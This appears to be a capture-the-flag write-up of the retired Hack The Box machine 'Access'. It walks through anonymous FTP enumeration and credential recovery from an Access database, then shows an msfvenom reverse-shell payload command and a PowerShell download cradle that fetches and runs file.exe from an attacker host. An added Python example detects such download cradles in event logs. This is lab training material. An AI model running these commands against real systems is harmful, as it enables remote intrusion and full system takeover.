Introduction

For the uninitiated, Hack The Box is an online platform to practice and advance your expertise in penetration testing and cybersecurity (or showcase my own ineptitude). They offer both an unpaid and a paid subscription, with the unpaid service allowing access to the 20 most current boxes. You will discover when attempting to register for the platform that the real price of admission, however, is rather steep. There are ongoing competitions between universities, organizations, and countries along with an individual leaderboard. The write-up below is for a box named “Access” which is now retired.

Access

We will begin at the beginning and continue until we come to the end; then type root.txt. Warning, the following write-up contains judicious use of PowerShell.

First, we need to enumerate. The nmap scan reveals that we are dealing with a Microsoft Windows host which has several Microsoft services running, such as File Transfer Protocol, Telnet, and Hypertext Transfer Protocol (IIS).

Telnet is accessible, but we don’t currently have a username or password. FTP allows anonymous access with two folders visible, Backups and Engineer, which contain two files, backup.mdb and Access Control.zip. Let’s enable binary transfer mode and download them.

Access Control.zip contains a .pst mailbox file, but the file is password protected. Therefore, we need to focus our attention on the backup.mdb file. An Access database can be read in Linux using the mdb utilities, such as mdb-tables to list the tables and mdb-export to export the data contained in a table. There is an auth_user table which contains some interesting information, perhaps the password for the .zip file:

27,"engineer","access4u@security",1,"08/23/18 21:13:36",26 

We simply need to open the .pst file with Evolution. There is one message in the .pst which reveals the username and password to access Telnet.

Now, we have a foothold on the system. The next step will be to escalate our privilege and retrieve the root.txt file. We are mainly concerned with finding misconfigurations on the local system.

Several hours later…

There is one such misconfiguration on this host, found below. The Administrator account does not require a password, which is likely stored on the host. We can leverage this misconfiguration to download and execute a malicious binary.

We can use msfvenom to construct our malicious binary which will unload a reverse shell payload. This file will be placed in our web directory and downloaded to the host using a PowerShell script.

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.15.1 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o /var/www/html/file.exe

However, we don’t have access to any application that can download files, including bitsadmin. What we can do is redirect our script into a file using echo. Note, this may not be the most elegant method to solve this particular problem. The PowerShell command will run our script and download the malicious binary that we created.

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.1/file.exe" >> wget.ps1
echo $file = "file.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\Users\security>powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
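
On the defensive side, this download-and-run sequence is visible when process command-line auditing and PowerShell script block logging are enabled. The following is an added example (not part of the original write-up) that correlates the two; the record layout, the sample events and the function name find_download_cradles are constructed for illustration.

```python
import re
from ntpath import basename  # Windows path handling on any OS

# Constructed, simplified records modelled on the commands in this write-up.
# "process" ~ process creation with command line (e.g. Event ID 4688);
# "scriptblock" ~ PowerShell script block logging (Event ID 4104).
SAMPLE_EVENTS = [
    {"type": "process", "user": "security",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -NoLogo "
                "-NonInteractive -NoProfile -File wget.ps1"},
    {"type": "scriptblock", "path": r"C:\Users\security\wget.ps1",
     "text": '$webclient = New-Object System.Net.WebClient\n'
             '$url = "http://10.10.15.1/file.exe"\n'
             '$webclient.DownloadFile($url,$file)'},
    {"type": "process", "user": "admin",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\rotate-logs.ps1"},
    {"type": "scriptblock", "path": r"C:\Scripts\rotate-logs.ps1",
     "text": r"Get-ChildItem C:\Logs | Remove-Item"},
]

BYPASS = re.compile(r"-(?:ep|ex\w*)\s+(?:bypass|unrestricted)", re.I)
SCRIPT_ARG = re.compile(r"-f(?:ile)?\s+\"?([^\"\s]+\.ps1)", re.I)
DOWNLOAD = re.compile(r"Net\.WebClient.*DownloadFile", re.I | re.S)
EXE_URL = re.compile(r"https?://[^\s\"']+\.(?:exe|dll|scr)", re.I)

def find_download_cradles(events):
    """Flag PowerShell runs whose script downloads a binary over HTTP."""
    # Index logged script bodies by lower-cased file name for correlation.
    scripts = {basename(e["path"]).lower(): e["text"]
               for e in events if e["type"] == "scriptblock"}
    findings = []
    for e in events:
        if e["type"] != "process" or "powershell" not in e["cmdline"].lower():
            continue
        arg = SCRIPT_ARG.search(e["cmdline"])
        if not arg:
            continue
        name = basename(arg.group(1))
        body = scripts.get(name.lower(), "")
        reasons = []
        if BYPASS.search(e["cmdline"]):
            reasons.append("execution policy overridden on the command line")
        if DOWNLOAD.search(body):
            reasons.append("script uses Net.WebClient DownloadFile")
        urls = EXE_URL.findall(body)
        if urls:
            reasons.append("script references a remote executable")
        if len(reasons) >= 2:  # one weak signal alone is not reported
            findings.append({"user": e["user"], "script": name,
                             "urls": urls, "reasons": reasons})
    return findings
```
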

Finally, we will set up Metasploit to receive our incoming reverse shell from the host. Then, run our malicious binary file.exe from the command line.

At this point, we have complete control of the system and type the root.txt file to the console. The root.txt file contains proof that we have control of the host. You may feel compelled to dance at this point. There are many styles to the “root dance” but most importantly, find your own style and own it.